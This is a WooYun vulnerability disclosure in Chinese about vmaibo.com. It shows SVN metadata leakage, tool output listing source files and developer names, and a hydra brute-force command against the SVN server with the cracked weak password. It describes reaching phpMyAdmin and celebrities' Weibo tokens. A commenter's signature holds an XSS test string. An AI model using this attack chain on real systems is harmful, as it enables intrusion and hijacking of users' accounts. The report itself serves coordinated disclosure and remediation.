当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036894

漏洞标题:敏感信息泄露系列#2 开发运维管理不当可导致微博大V被控制

相关厂商:vmaibo.com

漏洞作者: 猪猪侠

提交时间:2013-09-12 19:29

修复时间:2013-10-27 19:30

公开时间:2013-10-27 19:30

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-12: 细节已通知厂商并且等待厂商处理中
2013-09-13: 厂商已经确认,细节仅向厂商公开
2013-09-23: 细节向核心白帽子及相关领域专家公开
2013-10-03: 细节向普通白帽子公开
2013-10-13: 细节向实习白帽子公开
2013-10-27: 细节向公众公开

简要描述:

有时候,一个微不足道的信息泄露问题就能造成整个企业安全的崩盘
过去几年中,安全领域在如何处理自身漏洞的评估方面取得了长足的进步,几乎每个企业或个人都越来越多地依托第三方系统来运营自身业务,第三方系统被入侵的同时也将导致相关企业威胁增加。
#安全需要顾全整体#
http://www.wooyun.org/bugs/wooyun-2013-032750 续集!

详细说明:

#1 检测发现vmaibo所有业务系统都存在SVN信息泄露
http://www.vmaibo.com/.svn/entries
http://biz.vmaibo.com/.svn/entries
http://read.vmaibo.com/.svn/entries

svn_disclosure.py http://vmaibo.com /
*****************************************************
* Fetching: http://vmaibo.com
* mkdir vmaibo.com
* svn://127.0.0.1:3396/vmaibo-person
* svn://127.0.0.1:3396
*****************************************************
/Lang
/Conf
FILE: jsversons.php
FILE: routes.php
FILE: config-dev.php
FILE: config-release.php
/upgrade
FILE: 360_update_file.php
FILE: 360_update_file2.php
FILE: wb_recommend_user.php
FILE: wb_recommend_user_delete.php
FILE: update_table_data.php
FILE: insert_competitor_data.php
FILE: 360_add_table.php
/Common
FILE: common.php
/contact
FILE: index.php
/Tpl
FILE: layout.html
FILE: dispatch_jump.tpl
FILE: think_exception.tpl
/Tpl/Timer
FILE: repost.html
FILE: history.html
FILE: index_bak.html
FILE: index.html
/Tpl/Using
FILE: index.html
/Tpl/Fans
FILE: default.html
FILE: index.html
/Tpl/Material
FILE: index.html
FILE: add.html
/Tpl/Service
FILE: integrate.html
FILE: weibo.html
FILE: index.html
/Tpl/Customer
FILE: first_page.html
FILE: index.html
/Tpl/Comment
FILE: index.html
FILE: setReply.html
/Tpl/Track
FILE: index.html
/Tpl/Attention
FILE: index.html
/Tpl/Permition
FILE: none.html
/Tpl/Sentiment
FILE: detonate.html
FILE: index.html
/Tpl/Messages
FILE: comment.html
FILE: comment2.html
FILE: index.html
/Tpl/Member
FILE: auth.html
FILE: agreement.html
FILE: join_ok.html
/Tpl/Index
FILE: main-bak.html
FILE: main.html
FILE: index.html
/Tpl/Recommend
FILE: indexcomment2.html
FILE: tencent_category.html
FILE: other_bak.html
FILE: other_category.html
FILE: tencent.html
FILE: other.html
FILE: index.html
FILE: indextezhu.html
FILE: indexsfx.html
FILE: index2.html
FILE: indexcomment.html
/Tpl/Besiness
FILE: index.html
/Tpl/Tool
FILE: index.html
/Tpl/Public
FILE: footer.html
FILE: left_menu.html
FILE: header.html
FILE: left_menu-bk.html
FILE: cookie.js
FILE: ContentState.js
FILE: left_menu.js
FILE: Teaching.js
FILE: kingwolfofsky.js
FILE: atUser.js
/Tpl/Public/js
/script
FILE: clean_detonated.php
FILE: kaifu.php
/script/log
/Lib
/Public
*****************************************************
Author: xlxi
Author: xm
Author: zhouli
Author: ygli
Author: fqwang
Author: xxl
*****************************************************


# 微博名人版

svn_disclosure.py http://read.vmaibo.com /
*****************************************************
* Fetching: http://read.vmaibo.com
* mkdir read.vmaibo.com
* svn://219.239.***.*:3396/vmaibo-read
* svn://219.239.***.*:3396
*****************************************************
/Test
FILE: Test.php
/Lang
/Runtime
/Conf
FILE: jsversons.php
FILE: authuser.php
FILE: routes.php
/upgrade
/scripts
FILE: talk.php
FILE: timer_pid.php
FILE: timer.php
FILE: config.php
/scripts/log
/scripts/plugin
FILE: Sina.class.php
/Common
FILE: common.php
/manage
FILE: index.php
/manage/My97DatePicker
FILE: config.js
FILE: calendar.js
FILE: My97DatePicker.htm
FILE: WdatePicker.js
FILE: zh-cn.js
/manage/My97DatePicker/lang
FILE: datePicker.gif
FILE: Thumbs.db
FILE: WdatePicker.css
/manage/My97DatePicker/skin
/manage/conf
FILE: driver.php
FILE: config.php
/manage/lib
FILE: ActionBase.class.php
FILE: Page.class.php
FILE: Helper.class.php
/manage/template
FILE: talk_audit.js
FILE: index.php
/manage/action
FILE: TalkAudit.class.php
/Tpl
/Lib
/Data
/Api
FILE: index.php
/Api/conf
FILE: config.php
/Api/modules
FILE: show_user.php
FILE: status_counts.php
FILE: daily_trends.php
FILE: repost_timeline.php
FILE: shorten.php
FILE: show_status.php
FILE: user_timeline.php
FILE: trends_timeline.php
FILE: get_comments_by_mid.php
FILE: status_search.php
/Api/libs
FILE: callback.php
FILE: config.php
FILE: weibooauth.php
FILE: index.php
FILE: success.php
/Public
*****************************************************
Author: xlxi
Author: fqwang
Author: ygli
*****************************************************


#2 通过SVN泄露的信息,间接利用
通过泄露的信息得知SVN服务器的物理真是地址,219.239.***.*,结合已经获取到的author信息,构造弱口令字典,进行自动化暴力猜解。

Author: xlxi
Author: fqwang
Author: ygli
Author: xlxi
Author: xm
Author: zhouli
Author: xxl


./hydra -L vmaibo_user.txt -P vmaibo_pass.txt 219.239.***.* Subversion
成功爆破出fqwang用户弱口令fqwang + 2013
#3 通过SVN check 开发版本源码

svn_checkout.jpg


.jpg


漏洞证明:

# 脉搏网自带phpmyadmin功能,通过源码目录找到的数据库密码连接
http://read.vmaibo.com/phpmyadmin/
http://www.vmaibo.com/phpmyadmin/

weibo_利用_token.jpg


# 后台地址
http://adm.vmaibo.com/login
# 间接利用,可以直接获取到李开复同学的微博TOKEN
受影响的大V如下:http://www.vmaibo.com/using

.jpg

修复方案:

#1 删除掉svn泄露地址
#2 重命名phpmyadmin地址
#3 svn服务端管理端口不对外开放

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-09-13 15:38

厂商回复:

感谢提出漏洞,我们已经着手处理了,并且正在进行安全处理,感谢猪猪侠!

最新状态:

暂无

漏洞评价:

评论

  1. 2013-09-12 17:10 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    @猪猪侠 标题旁边有个云~~~是不是加精了~~??@

  2. 2013-09-12 20:24 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    标题旁边有个云~~~是不是加精了~~??@

  3. 2013-09-12 20:58 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    同时,从你通篇的详细介绍中我可以看出来,你是一个人才,以后必成大器!!!

  4. 2013-09-12 21:34 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    标题旁边有个云~~~是不是加精了~~??@

  5. 2013-09-12 21:35 | winsyk ( 普通白帽子 | Rank:108 漏洞数:16 | 越长大越孤单)

    厂商估计在加班加点修复漏洞。。。

  6. 2013-09-12 22:14 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    为嘛皮皮那会儿没有加精啊。。。

  7. 2013-09-12 22:15 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @齐迹 皮皮能搞李开复、周鸿祎、潘石屹、伊能静吗?

  8. 2013-09-12 22:16 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    @猪猪侠 好吧 膜拜!

  9. 2013-09-13 08:58 | xfkxfk 认证白帽子 ( 核心白帽子 | Rank:2179 漏洞数:338 | 呵呵!)

    @猪猪侠,你是要闹哪样啊

  10. 2013-09-13 14:16 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    @猪猪侠 求 谢霆锋 陈奕迅 孙燕姿 周星驰

  11. 2013-10-14 10:41 | winsyk ( 普通白帽子 | Rank:108 漏洞数:16 | 越长大越孤单)

    赞。

  12. 2013-10-14 11:10 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    我以为利用开复老师的微博和他对话了呢。。。

  13. 2013-10-27 22:49 | big、face ( 普通白帽子 | Rank:144 漏洞数:36 | |上天请赐我一个洞|想要一件乌云衣服|)

    mark

  14. 2013-10-28 08:00 | 雷锋小号 ( 路人 | 还没有发布任何漏洞 | 乌云现在就缺我这种默默顶贴从来不求脸熟的...)

    默默的关注一下老大

  15. 2013-10-28 09:02 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @猪猪侠 求svn_disclosure.py源码

  16. 2015-01-22 09:17 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    爆破SVN的思路很赞...学习啦。